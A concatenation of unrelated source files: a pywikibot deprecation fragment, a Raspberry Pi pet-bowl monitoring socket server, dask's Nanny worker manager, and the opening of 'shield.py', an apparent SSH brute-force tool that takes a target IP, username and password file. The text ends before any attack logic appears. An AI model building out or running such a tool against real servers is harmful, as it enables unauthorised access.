since='20141218')
wrapper._add_deprecated_attr(
'QuitKeyboardInterrupt', _QuitKeyboardInterrupt,
warning_message='pywikibot.QuitKeyboardInterrupt is deprecated; '
'use pywikibot.bot.QuitKeyboardInterrupt instead.',
since='20150619')
wrapper._add_deprecated_attr(
'UploadWarning', _UploadWarning,
warning_message='pywikibot.UploadWarning is deprecated; '
'use APISite.upload with a warning handler instead.',
since='20150921')
wrapper._add_deprecated_attr(
'MediaWikiVersion', _MediaWikiVersion,
warning_message='pywikibot.MediaWikiVersion is deprecated; '
'use pywikibot.tools.MediaWikiVersion instead.',
since='20180827')
|
main.py
|
"""Team Lightning Project 2017 Pet Pal Home-Care System
Author: Ben Dodd (mitgobla)
Version: 1.0.2
Date: 20/03/17"""
import socket #Used to create the server
import sys #Used to terminate the program
import time #Used to pausing and time management
import os #Used to gather temperature
from threading import Thread #Used to run server more efficiently
import pigpio #Used for the control of LEDs
HOST = '192.168.1.64' #Local IP address of the PI when running on the BTBusinessHub
PORT = 80 #Unblocked HTTP port
RED_PIN = 27 #GPIO Pin for RED LED
GREEN_PIN = 17 #GPIO Pin for GREEN LED
BLUE_PIN = 22 #GPIO Pin for BLUE LED
class Bowl(): #Ultrasonic Sensor Module
"""Class used to store and calculate bowl values"""
def __init__(self): #Creates all the variables to be used by the class
"""Class used to store and calculate bowl values"""
#Status: stores the state of the bowl e.g. calibrating, fill, etc.
self.status = 'Need Setup'
#Depth: stores the depth of the bowl e.g. full, empty, etc.
self.depth = 'Empty'
print("Created bowl module")
def set_status(self, new_status):
"""Change the status of the bowl""" #<---
self.status = new_status
print("Bowl Status: ", self.status)
return self.status
def set_depth(self, new_depth):
"""Change the depth value of the bowl""" #<---
self.depth = new_depth
print("Bowl Depth: ", self.depth)
return self.depth
def get_depth(self):
"""Get the depth value of the bowl""" #<---
print("Bowl Depth: ", self.depth)
return self.depth
def get_status(self):
"""Get the status of the bowl""" #<---
print("Bowl Status: ", self.status)
return self.status
class Temperature(): #Temperature module
"""Class used to store and calculate temperature values"""
def __init__(self):
"""Class used to store and calculate temperature values"""
self.temperature = 'Need Setup' #Stores values like Hot, Mild, etc.
print("Created temperature module")
def set_temperature(self, new_temperature):
"""Change the temperature value of the hub""" #<---
self.temperature = new_temperature
print("Temperature: ", self.temperature)
return self.temperature
def get_temperature(self):
"""Get the temperature value of the hub""" #<---
print("Temperature: ", self.temperature)
return self.temperature
class Lighting():
"""Class used to control LED lighting"""
def __init__(self):
"""Class used to control LED lighting"""
self.hub = pigpio.pi()
self.red_led = self.hub.set_PWM_dutycycle(27, 0) #Sets the RED LED brightness to 0
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
print("Created LED module")
def reset(self):
"""Turns off all the LEDs"""
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
print("Reset ALL LEDS")
def red(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.red_led = self.hub.set_PWM_dutycycle(27, 255)
elif int(brightness) < 0:
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
else:
self.red_led = self.hub.set_PWM_dutycycle(27, int(brightness))
print("Updated Brightness")
except TypeError as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.red_led = self.hub.set_PWM_dutycycle(27, 255)
elif brightness < 0:
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
else:
self.red_led = self.hub.set_PWM_dutycycle(27, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
def green(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.green_led = self.hub.set_PWM_dutycycle(17, 255)
elif int(brightness) < 0:
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
else:
self.green_led = self.hub.set_PWM_dutycycle(17, int(brightness))
print("Updated Brightness")
except TypeError as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.green_led = self.hub.set_PWM_dutycycle(17, 255)
elif brightness < 0:
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
else:
self.green_led = self.hub.set_PWM_dutycycle(17, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
def blue(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.blue_led = self.hub.set_PWM_dutycycle(22, 255)
elif int(brightness) < 0:
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
else:
self.blue_led = self.hub.set_PWM_dutycycle(22, int(brightness))
print("Updated Brightness")
except TypeError as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.blue_led = self.hub.set_PWM_dutycycle(22, 255)
elif brightness < 0:
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
else:
self.blue_led = self.hub.set_PWM_dutycycle(22, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
class Hub():
"""Class used for main server management"""
def __init__(self, host, port):
"""Class used for main server management"""
self.temp_module = None
self.bowl_module = None
self.led_module = None
self.server_running = False
self.mode = None
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.changeable_port = int(port)
self.server.bind((str(host), int(port)))
print("Created host and port")
except socket.error:
try:
self.changeable_port += 1
self.server.bind((str(host), self.changeable_port))
print('Created host and port')
except socket.error as error_message:
print("Failed to bind. Error:", str(error_message))
sys.exit()
def add_temperature_module(self):
"""Create a temperature module"""
self.temp_module = Temperature()
with os.popen('vcgencmd measure_temp') as measurement:
raw_temperature = measurement.read().strip()
celsius = int(raw_temperature[5:len(raw_temperature)-4])-15
if celsius/26 >= 0.66:
self.temp_module.set_temperature(b'Hot')
elif celsius/26 >= 0.33:
self.temp_module.set_temperature(b'Normal')
else:
self.temp_module.set_temperature(b'Cold')
print("Added Temperature module")
def set_temperature_module(self):
"""Update the temperature"""
with os.popen('vcgencmd measure_temp') as measurement:
raw_temperature = measurement.read().strip()
celsius = int(raw_temperature[5:len(raw_temperature)-4])-15
if celsius/26 >= 0.66:
self.temp_module.set_temperature(b'Hot')
elif celsius/26 >= 0.33:
self.temp_module.set_temperature(b'Normal')
else:
self.temp_module.set_temperature(b'Cold')
print("Updated Temperature Module")
def add_bowl_module(self):
#Status information:
#1: First time setup
#2: Calibrating
#3. Fill the Bowl
#4. Done Calibration
"""Create a Bowl module"""
self.bowl_module = Bowl()
self.bowl_module.set_status("1")
print("Added Bowl Module")
def set_bowl_module(self, depth):
"""Update the bowl"""
self.bowl_module.set_depth(depth)
print("Updated Bowl Module")
def set_bowl_status(self, status):
"""Update the bowl status"""
self.bowl_module.set_status(status)
print("Updated Bowl Module Status")
def add_led_module(self):
"""Gains control of the LEDs on the hub"""
self.led_module = Lighting()
self.led_module.red(255)
self.led_module.green(255)
print("Added LED Module")
def run_server(self):
"""Run the server side of the hub"""
#--------------------- ADD MODULES HERE --------------
self.add_bowl_module()
self.add_temperature_module()
#-----------------------------------------------------
#-----------------------------------------------------
self.server_running = True
self.run_visuals()
self.server.listen(100)
print("Waiting for connections")
while self.server_running:
connection, address = self.server.accept()
print("Connected with ", address[0], ":", address[1])
#----------------------------------------------------
data = connection.recv(1024)
#----------------------------------------------------
#------------------ CODES ---------------------------
#1: Ultrasonic sensor
#1a: Calibrating
#1b: Fill Bowl
#1c: Calibrated
#1A: Full
#1B: Low
#1C: Empty
#2: Mobile Phone
#2a: Mode Temp
#2b: Mode Bowl
#2c: Mode None
#2A: Get Bowl
#2B: Get Temp
if data == b'1': #ULTRASONIC SENSOR HAS CONNECTED
print("Ultrasonic sensor has connected")
time.sleep(1) #ALLOW DELAY FOR DATA TO BE RECEIVED
try:
data = connection.recv(1024) #DEVICE IS SENDING INFORMATION
print("Data received from ultrasonic sensor")
except (ConnectionAbortedError, ConnectionResetError): #DEVICE HAS DISCONNECTED
break
#------------- PROCESS DATA --------------------
if not data: #DEVICE HAS DISCONNECTED CORRECTLY
break
elif data == b'1a': #DEVICE IS CALIBRATING
print("Ultrasonic sensor calibrating")
self.bowl_module.set_status("2")
elif data == b'1b': #DEVICE WANTS USER TO FILL BOWL
print("Ultrasonic sensor needs filling")
self.bowl_module.set_status("3")
elif data == b'1c': #DEVICE IS COMPLETE
print("Ultrasonic sensor completed")
self.bowl_module.set_status("4")
elif data == b'1A': #DEVICE IS FULL
print("Bowl is full")
self.bowl_module.set_depth(b'Full')
elif data == b'1B': #DEVICE IS LOW
print("Bowl is low")
self.bowl_module.set_depth(b'Low')
elif data == b'1C': #DEVICE IS EMPTY
print("Bowl is empty")
self.bowl_module.set_depth(b'Empty')
try:
connection.close()
except Exception:
pass
#--------------------------------------------------------------
elif data == b'2': #MOBILE PHONE HAS CONNECTED
print("Phone has connected")
time.sleep(1) #ALLOW DELAY FOR DATA TO BE RECEIVED
try:
data = connection.recv(1024) #DEVICE IS SENDING INFORMATION
print("Data received from phone")
except (ConnectionAbortedError, ConnectionResetError): #DEVICE HAS DISCONNECTED
break
#------------- PROCESS DATA --------------------
if not data:
break
elif data == b'2a':
self.mode = "Temp"
print("Mode changed to Temp")
elif data == b'2b':
self.mode = "Bowl"
print("Mode changed to Bowl")
elif data == b'2c':
self.mode = None
print("Mode changed to None")
elif data == b'2A':
time.sleep(1)
print("Sending depth")
connection.send(b'bowl '+self.bowl_module.get_depth())
elif data == b'2B':
print("Sending Temperature")
time.sleep(1)
connection.send(b'temp '+self.temp_module.get_temperature())
try:
connection.close()
except Exception:
pass
elif not data or data == b'forceshutdown':
connection.close()
self.server_running = False
self.server.close()
def run_visuals(self):
"""Run the visual side of the hub"""
while self.server_running:
while self.mode == "Temp":
print("Temp Mode LED")
temp = self.temp_module.get_temperature()
if temp == b'Hot':
print("LED HOT")
self.led_module.red(255)
self.led_module.green(100)
self.led_module.blue(0)
if temp >= b'Normal':
print("LED NORMAL")
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(50)
else:
print("LED COLD")
self.led_module.red(0)
self.led_module.green(50)
self.led_module.blue(255)
time.sleep(15)
while self.mode == "Bowl":
print("Bowl mode LED")
status = self.bowl_module.get_status()
if status == "1":
print("LED RED")
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(0)
elif status == "2":
print("LED PURPLE")
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(255)
elif status == "3":
print("LED CYAN")
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(255)
elif status == "4":
depth = self.bowl_module.get_depth()
if depth == b'Full':
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(0)
elif depth == b'Low':
self.led_module.red(255)
self.led_module.green(255)
self.led_module.blue(0)
else:
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(0)
time.sleep(15)
while self.mode is None:
self.led_module.reset()
time.sleep(5)
PET_PAL = Hub(HOST, PORT)
Thread(target=PET_PAL.run_server()).start()
|
nanny.py
|
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from multiprocessing.queues import Empty
from time import sleep as sync_sleep
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
mp_context,
parse_ports,
parse_timedelta,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fractiom of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
# The interval how often to check the msg queue for init
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
shield.py
|
import paramiko
import os
import sys
import socket
import threading, time
from termcolor import colored
exit_tag = 0
shield = '''
,----. ,-. ,----.,------. ,-. ,-.,-. ,-.
/ ,-,_/ ,' | / / /`-, ,-',' | / // |/ /
/ / __ ,' ,| | / ,---' / / ,' ,| | / // / /
/ '-' /,' ,--. |/ / / /,' ,--. |/ // /| /
`----''--' `-'`'.--""""--.--' `-'`' `' `-'
nnnnnnnnnnnnnnnn,'.n*""""*N.`.#######################
NNNNNNNNNNNNNNN/ J',n*""*n.`L \##### ### ### ### ####
: J J___/\___L L :#####################
nnnnnnnnnnnnnn{ [{ `SHIELD.' }] }## ### ### ### ### ##
NNNNNNNNNNNNNN: T T /,'`.\ T J :#####################
\ L,`*n,,n*',J /
nnnnnnnnnnnnnnnn`. *n,,,,n* ,'nnnnnnnnnnnnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNN`-..__..-'NNNNNNNNNNNNNNNNNNNNNNNNN
,-. ,-. ,-. ,----. ,----.,-. ,----. ,-.
| `. \ `.| \\ .--`\ \"L \\ \\ .-._\ | `.
| |. `. \ \ ` L \\ __\ \ . < \ \\ \ __ | |. `.
| .--. `.\ \`-'\ \\ `---.\ \L `.\ \\ `-` \| .--. `.
`-' `--``' `-'`----' `-'`-' `' `----'`-' `--'
'''
logo = '''
,----. ,-. ,----.,------. ,-. ,-.,-. ,-.
/ ,-,_/ ,' | / / /`-, ,-',' | / // |/ /
/ / __ ,' ,| | / ,---' / / ,' ,| | / // / /
/ '-' /,' ,--. |/ / / /,' ,--. |/ // /| /
`----''--' `-'`'.--""""--.--' `-'`' `' `-'
nnnnnnnnnnnnnnnn,'.n*""""*N.`.#######################
NNNNNNNNNNNNNNN/ J',n*""*n.`L \##### ### ### ### ####
: J J___/\___L L :#####################
nnnnnnnnnnnnnn{ [{ `. ,' }] }## ### ### ### ### ##
NNNNNNNNNNNNNN: T T /,'`.\ T J :#####################
\ L,`*n,,n*',J /
nnnnnnnnnnnnnnnn`. *n,,,,n* ,'nnnnnnnnnnnnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNN`-..__..-'NNNNNNNNNNNNNNNNNNNNNNNNN
,-. ,-. ,-. ,----. ,----.,-. ,----. ,-.
| `. \ `.| \\ .--`\ \"L \\ \\ .-._\ | `.
| |. `. \ \ ` L \\ __\ \ . < \ \\ \ __ | |. `.
| .--. `.\ \`-'\ \\ `---.\ \L `.\ \\ `-` \| .--. `.
`-' `--``' `-'`----' `-'`-' `' `----'`-' `--'
------------------------------------------------
By Emre Koybasi https://github.com/emrekybs
'''
print(logo)
time.sleep(1.5)
print("\n SHIELD SSH Attack Starting...")
os.system("notify-send 'Shield Successfully initiated'")
time.sleep(2)
if len(sys.argv) != 4:
print(colored("\n[*]usage python3 shield.py <Target Ip> <username> <password-file>\n\n", 'white', attrs=['reverse', 'blink']))
sys.exit(0)
target_ip = sys.argv[1]
username = sys.argv[2]
password_file = sys.argv[3]
